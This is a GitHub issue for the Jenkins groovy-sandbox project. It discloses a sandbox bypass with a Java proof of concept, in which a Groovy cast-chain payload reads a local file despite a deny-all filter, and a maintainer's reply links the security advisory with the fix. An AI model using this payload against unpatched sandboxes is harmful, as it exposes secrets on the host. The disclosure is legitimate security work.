jenkinsci / groovy-sandbox

(Deprecated) Compile-time transformer to run Groovy code in a restrictive sandbox
MIT License

Arbitrary file read #53

Closed XmiliaH closed 5 years ago

XmiliaH commented 5 years ago

The following script can read files, even with a DenyAll filter:

import java.io.FileOutputStream;
import java.io.IOException;

import org.codehaus.groovy.control.CompilerConfiguration;
import org.kohsuke.groovy.sandbox.GroovyValueFilter;
import org.kohsuke.groovy.sandbox.SandboxTransformer;

import groovy.lang.GroovyShell;

public class Main {

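    public static void main(String[] args) throws IOException {
        // Create a file that the sandboxed script must not be able to read.
        try(FileOutputStream fos=new FileOutputStream("secret.txt")){
            fos.write("Super Secret".getBytes());
        }

        // Compile every evaluated script through the sandbox transformer.
        GroovyShell gs = new GroovyShell(new CompilerConfiguration().addCompilationCustomizers(new SandboxTransformer()));
        // Deny-all filter: any value the sandbox passes to the filter is rejected.
        GroovyValueFilter fa = new GroovyValueFilter() {
            @Override
            public Object filter(Object o) {
                throw new RuntimeException("Denied");
            }
        };
        // Activate the filter for the current thread.
        fa.register();
        try {
            // The script is a closure put through a chain of casts; with the filter active it is expected to throw "Denied".
            System.out.println(gs.evaluate("var i=0;{->if(i){return['secret.txt']as Object[]}else{i=1;return;}}as Collection as File as Object[]as Collection"));
        }finally {
            // Always remove the filter again, even if evaluation throws.
            fa.unregister();
        }
    }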

}

Expected output: RuntimeException: Denied

Output: [Super Secret]

Using groovy-3.0-alpha-4 & Java 1.8

daniel-beck commented 5 years ago

@XmiliaH Thanks for the report! Fixed in https://jenkins.io/security/advisory/2019-07-31/#SECURITY-1465%20(1)

As you may have noticed, this issue tracker is not well monitored. In the future, please report issues as described on https://jenkins.io/security/#reporting-vulnerabilities

Would you like to be credited with this discovery in the security advisory, and if so, how?